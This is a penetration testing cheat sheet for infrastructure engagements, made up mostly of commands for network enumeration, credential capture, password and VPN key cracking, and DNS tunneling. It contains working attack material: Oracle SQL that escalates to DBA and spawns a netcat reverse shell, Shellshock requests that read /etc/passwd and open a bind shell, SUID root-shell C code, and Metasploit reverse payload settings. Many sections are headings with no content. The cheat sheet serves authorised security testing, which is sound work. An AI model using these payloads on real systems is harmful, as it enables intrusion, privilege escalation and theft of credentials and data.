Penetration Testing Tools Cheat Sheet
Introduction
Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands a third-party pen test company would run when performing a manual infrastructure penetration test. For more in depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.
The focus of this cheat sheet is infrastructure / network penetration testing, web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For Web Application Penetration Testing, check out the Web Application Hackers Hand Book, it is excellent for both learning and reference.
If I’m missing any pen testing tools here give me a nudge on twitter.
Changelog
16/09/2020 - fixed some formatting issues (more coming soon I promise). 17/02/2017 - Article updated, added loads more content, VPN, DNS tunneling, VLAN hopping etc - check out the TOC below.
Introduction
Changelog
Pre-engagement
Network Configuration
Set IP Address
Subnetting
OSINT
Passive Information Gathering
DNS
WHOIS enumeration
Perform DNS IP Lookup
Perform MX Record Lookup
Perform Zone Transfer with DIG
DNS Zone Transfers
Email
Simply Email
Semi Active Information Gathering
Basic Finger Printing
Banner grabbing with NC
Active Information Gathering
DNS Bruteforce
DNSRecon
Port Scanning
Nmap Commands
Nmap UDP Scanning
UDP Protocol Scanner
Other Host Discovery
Enumeration & Attacking Network Services
SAMB / SMB / Windows Domain Enumeration
Samba Enumeration
SMB Enumeration Tools
Fingerprint SMB Version
Find open SMB Shares
Enumerate SMB Users
Manual Null session testing:
NBTScan unixwiz
LLMNR / NBT-NS Spoofing
Metasploit LLMNR / NetBIOS requests
Responder.py
SNMP Enumeration Tools
SNMPv3 Enumeration Tools
R Services Enumeration
RSH Enumeration
RSH Run Commands
Metasploit RSH Login Scanner
rusers Show Logged in Users
rusers scan whole Subnet
Finger Enumeration
Finger a Specific Username
Solaris bug that shows all logged in users:
rwho
TLS & SSL Testing
testssl.sh
Vulnerability Assessment
Database Penetration Testing
Oracle
Fingerprint Oracle TNS Version
Brute force oracle user accounts
Oracle Privilege Escalation
Identify default accounts within oracle db using NMAP NSE scripts:
How to identify the current privilege level for an oracle user:
Oracle priv esc and obtain DBA access:
Run the exploit with a select query:
Remove the exploit using:
Get Oracle Reverse os-shell:
MSSQL
Bruteforce MSSQL Login
Metasploit MSSQL Shell
Network
Plink.exe Tunnel
Pivoting
SSH Pivoting
Meterpreter Pivoting
TTL Finger Printing
IPv4 Cheat Sheets
Classful IP Ranges
IPv4 Private Address Ranges
IPv4 Subnet Cheat Sheet
VLAN Hopping
VPN Pentesting Tools
IKEForce
IKE Aggressive Mode PSK Cracking
Step 1: Idenitfy IKE Servers
Step 2: Enumerate group name with IKEForce
Step 3: Use ike-scan to capture the PSK hash
Step 4: Use psk-crack to crack the PSK hash
PPTP Hacking
NMAP PPTP Fingerprint:
PPTP Dictionary Attack
DNS Tunneling
Attacking Machine
BOF / Exploit
Exploit Research
Searching for Exploits
Compiling Windows Exploits on Kali
Cross Compiling Exploits
Exploiting Common Vulnerabilities
Exploiting Shellshock
cat file (view file contents)
Shell Shock run bind shell
Shell Shock reverse Shell
Simple Local Web Servers
Mounting File Shares
HTTP / HTTPS Webserver Enumeration
Packet Inspection
Username Enumeration
SMB User Enumeration
SNMP User Enumeration
Passwords
Wordlists
Brute Forcing Services
Hydra FTP Brute Force
Hydra POP3 Brute Force
Hydra SMTP Brute Force
Password Cracking
John The Ripper - JTR
Windows Penetration Testing Commands
Linux Penetration Testing Commands
Compiling Exploits
Identifying if C code is for Windows or Linux
Build Exploit GCC
GCC Compile 32Bit Exploit on 64Bit Kali
Compile Windows .exe on Linux
SUID Binary
SUID C Shell for /bin/bash
SUID C Shell for /bin/sh
Building the SUID Shell binary
Reverse Shells
TTY Shells
Python TTY Shell Trick
Spawn Interactive sh shell
Spawn Perl TTY Shell
Spawn Ruby TTY Shell
Spawn Lua TTY Shell
Spawn TTY Shell from Vi
Spawn TTY Shell NMAP
Metasploit Cheat Sheet
Meterpreter Payloads
Windows reverse meterpreter payload
Windows VNC Meterpreter payload
Linux Reverse Meterpreter payload
Meterpreter Cheat Sheet
Common Metasploit Modules
Remote Windows Metasploit Modules (exploits)
Local Windows Metasploit Modules (exploits)
Auxilary Metasploit Modules
Metasploit Powershell Modules
Post Exploit Windows Metasploit Modules
ASCII Table Cheat Sheet
CISCO IOS Commands
Cryptography
Hash Lengths
Hash Examples
SQLMap Examples
Pre-engagement
Network Configuration
Set IP Address
ifconfig eth0 xxx.xxx.xxx.xxx/24
Subnetting
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
OSINT
Passive Information Gathering
DNS
WHOIS enumeration
whois domain-name-here.com
Perform DNS IP Lookup
dig a domain-name-here.com @nameserver
Perform MX Record Lookup
dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver
DNS Zone Transfers
Simply Email
Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.
git clone https://github.com/killswitch-GUI/SimplyEmail.git
./SimplyEmail.py -all -e TARGET-DOMAIN
Simply Email can verify the discovered email addresss after gathering.
Semi Active Information Gathering
Basic Finger Printing
Manual finger printing / banner grabbing.
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referrer: meh-domain
<enter>
Active Information Gathering
DNS Bruteforce
DNSRecon
DNS Enumeration Kali - DNSRecon
root:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Port Scanning
Nmap Commands
For more commands, see the Nmap cheat sheet (link in the menu on the right).
Basic Nmap Commands:
I’ve had a few people mention about T4 scans, apply common sense here. Don’t use T4 commands on external pen tests (when using an Internet connection), you’re probably better off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices, embeded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan for the top 1000 so you can start pen testing then kick off a slower scan.
Nmap UDP Scanning
UDP Protocol Scanner
git clone https://github.com/portcullislabs/udp-proto-scanner.git
Scan a file of IP addresses for all services:
./udp-protocol-scanner.pl -f ip.txt
Scan for a specific UDP service:
udp-proto-scanner.pl -p ntp -f ips.txt
Other Host Discovery
Other methods of host discovery, that don’t use nmap…
Enumeration & Attacking Network Services
Penetration testing tools that spefically identify and / or enumerate network services:
SAMB / SMB / Windows Domain Enumeration
Samba Enumeration
SMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Also see, nbtscan cheat sheet (right hand menu).
Fingerprint SMB Version
smbclient -L //192.168.1.100
Find open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
RID Cycling:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid
Manual Null session testing:
Windows:
net use \\TARGET\IPC$ "" /u:""
Linux:
smbclient -L //192.168.99.131
NBTScan unixwiz
Install on Kali rolling:
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
LLMNR / NBT-NS Spoofing
Steal credentials off the network.
Metasploit LLMNR / NetBIOS requests
Spoof / poison LLMNR / NetBIOS requests:
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capture the hashes:
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
You’ll end up with NTLMv2 hash, use john or hashcat to crack it.
Responder.py
Alternatively you can use responder.
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0
Run Responder.py for the whole engagement
Run Responder.py for the length of the engagement while you're working on other attack vectors.
SNMP Enumeration Tools
A number of SNMP enumeration tools.
Fix SNMP output values so they are human readable:
apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf
SNMPv3 Enumeration Tools
Idenitfy SNMPv3 servers with nmap:
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:
apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
Use Metasploits Wordlist
Metasploit's wordlist (KALI path below) has common credentials for v1 & 2 of SNMP, for newer credentials check out Daniel Miessler's SecLists project on GitHub (not the mailing list!).
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
R Services Enumeration
This is legacy, included for completeness.
nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:
RSH Enumeration
RSH Run Commands
Metasploit RSH Login Scanner
auxiliary/scanner/rservices/rsh_login
rusers Show Logged in Users
rusers scan whole Subnet
rlogin -l <user> <target>
e.g rlogin -l root TARGET-SUBNET/24
Finger Enumeration
Finger a Specific Username
Solaris bug that shows all logged in users:
finger [email protected]
SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN
finger 'a b c d e f g h'@sunhost
rwho
Use nmap to identify machines running rwhod (513 UDP)
TLS & SSL Testing
testssl.sh
Test all the things on a single host and output to a .html file:
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
Vulnerability Assessment
Install OpenVAS 8 on Kali Rolling:
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
Verify openvas is running using:
Login at https://127.0.0.1:9392 - credentials are generated during openvas-setup.
Database Penetration Testing
Attacking database servers exposed on the network.
Oracle
Install oscanner:
Run oscanner:
oscanner -s 192.168.1.200 -P 1521
Fingerprint Oracle TNS Version
Install tnscmd10g:
apt-get install tnscmd10g
Fingerprint oracle tns:
tnscmd10g version -h TARGET
nmap --script=oracle-tns-version
Brute force oracle user accounts
Identify default Oracle accounts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Run nmap scripts against Oracle TNS:
Oracle Privilege Escalation
Requirements:
Oracle needs to be exposed on the network
A default account is in use like scott
Quick overview of how this works:
Create the function
Create an index on table SYS.DUAL
The index we just created executes our function SCOTT.DBA_X
The function will be executed by SYS user (as that’s the user that owns the table).
Create an account with DBA priveleges
In the example below the user SCOTT is used but this should be possible with another default Oracle account.
Identify default accounts within oracle db using NMAP NSE scripts:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Login using the identified weak account (assuming you find one).
How to identify the current privilege level for an oracle user:
SQL> select * from session_privs;
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid
curren_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;
Oracle priv esc and obtain DBA access:
Run netcat: netcat -nvlp 443
code>
SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs;
You should have a DBA user with creds user1 and pass1.
Verify you have DBA privileges by re-running the first command again.
Remove the exploit using:
Get Oracle Reverse os-shell:
begin
dbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;
MSSQL
Enumeration / Discovery:
Nmap:
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Metasploit:
msf > use auxiliary/scanner/mssql/mssql_ping
Use MS SQL Servers Browse For More
Try using "Browse for More" via MS SQL Server Management Studio
Bruteforce MSSQL Login
msf > use auxiliary/admin/mssql/mssql_enum
Metasploit MSSQL Shell
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
Network
Plink.exe Tunnel
PuTTY Link tunnel
Forward remote port to local address:
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
Pivoting
SSH Pivoting
Add socks4 127.0.0.1 1010 in /etc/proxychains.conf
SSH pivoting from one network to another:
Add socks4 127.0.0.1 1010 in /etc/proxychains.conf
Add socks4 127.0.0.1 1011 in /etc/proxychains.conf
Meterpreter Pivoting
TTL Finger Printing
IPv4 Cheat Sheets
Classful IP Ranges
E.g Class A,B,C (depreciated)
IPv4 Private Address Ranges
IPv4 Subnet Cheat Sheet
Subnet cheat sheet, not really realted to pen testing but a useful reference.
VLAN Hopping
Using NCCGroups VLAN wrapper script for Yersina simplifies the process.
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh
VPN Pentesting Tools
Identify VPN servers:
./udp-protocol-scanner.pl -p ike TARGET(s)
Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
IKEForce
Use IKEForce to enumerate or dictionary attack VPN servers.
Install:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
IKE Aggressive Mode PSK Cracking
Identify VPN Servers
Enumerate with IKEForce to obtain the group ID
Use ike-scan to capture the PSK hash from the IKE endpoint
Use psk-crack to crack the hash
Step 1: Idenitfy IKE Servers
./udp-protocol-scanner.pl -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
Some more advanced psk-crack options below:
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
PPTP Hacking
Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
DNS Tunneling
Tunneling data over DNS to bypass firewalls.
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
Attacking Machine
Installtion:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host <dnscat server_ip>
BOF / Exploit
Exploit Research
Find exploits for enumerated hosts / services.
Searching for Exploits
Install local copy of exploit-db:
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Cross Compiling Exploits
gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)
Exploiting Common Vulnerabilities
Exploiting Shellshock
A tool to find and exploit servers vulnerable to Shellshock:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
Simple Local Web Servers
Python local web server command, handy for serving up shells and exploits on an attacking machine.
How to mount NFS / CIFS, Windows and Linux file shares.
HTTP / HTTPS Webserver Enumeration
Packet Inspection
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
SMB User Enumeration
SNMP User Enumeration
Passwords
Wordlists
Brute Forcing Services
Hydra FTP Brute Force
Hydra POP3 Brute Force
Hydra SMTP Brute Force
Use -t
to limit concurrent connections, example: -t 15
Password Cracking
Password cracking penetration testing tools.
John The Ripper - JTR
Windows Penetration Testing Commands
See Windows Penetration Testing Commands.
Linux Penetration Testing Commands
See Linux Commands Cheat Sheet (right hand menu) for a list of Linux Penetration testing commands, useful for local system enumeration.
Compiling Exploits
Some notes on compiling exploits.
Identifying if C code is for Windows or Linux
C #includes will indicate which OS should be used to build the exploit.
Build Exploit GCC
Compile exploit gcc.
GCC Compile 32Bit Exploit on 64Bit Kali
Handy for cross compiling 32 bit binaries on 64 bit attacking machines.
Compile Windows .exe on Linux
Build / compile windows exploits on Linux, resulting in a .exe file.
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.
below are some quick copy and pate examples for various shells:
SUID C Shell for /bin/bash
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");
}
SUID C Shell for /bin/sh
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");
}
Building the SUID Shell binary
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su
from reverse shells.
Python TTY Shell Trick
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
Spawn Interactive sh shell
/bin/sh -i
Spawn Perl TTY Shell
exec "/bin/sh";
perl —e 'exec "/bin/sh";'
Spawn Ruby TTY Shell
exec "/bin/sh"
Spawn Lua TTY Shell
os.execute('/bin/sh')
Spawn TTY Shell from Vi
Run shell commands from vi:
:!bash
Spawn TTY Shell NMAP
!sh
A basic metasploit cheat sheet that I have found handy for reference.
Basic Metasploit commands, useful for reference, for pivoting see - Meterpreter Pivoting techniques.
Meterpreter Payloads
Windows reverse meterpreter payload
Windows VNC Meterpreter payload
Linux Reverse Meterpreter payload
Meterpreter Cheat Sheet
Useful meterpreter commands.
Top metasploit modules.
Remote Windows Metasploit Modules (exploits)
Local Windows Metasploit Modules (exploits)
Auxilary Metasploit Modules
Metasploit Powershell Modules
Post Exploit Windows Metasploit Modules
Windows Metasploit Modules for privilege escalation.
ASCII Table Cheat Sheet
Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.
CISCO IOS Commands
A collection of useful Cisco IOS commands.
Cryptography
Hash Lengths
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
SQLMap Examples
A mini SQLMap cheat sheet:
Last updated
Was this helpful?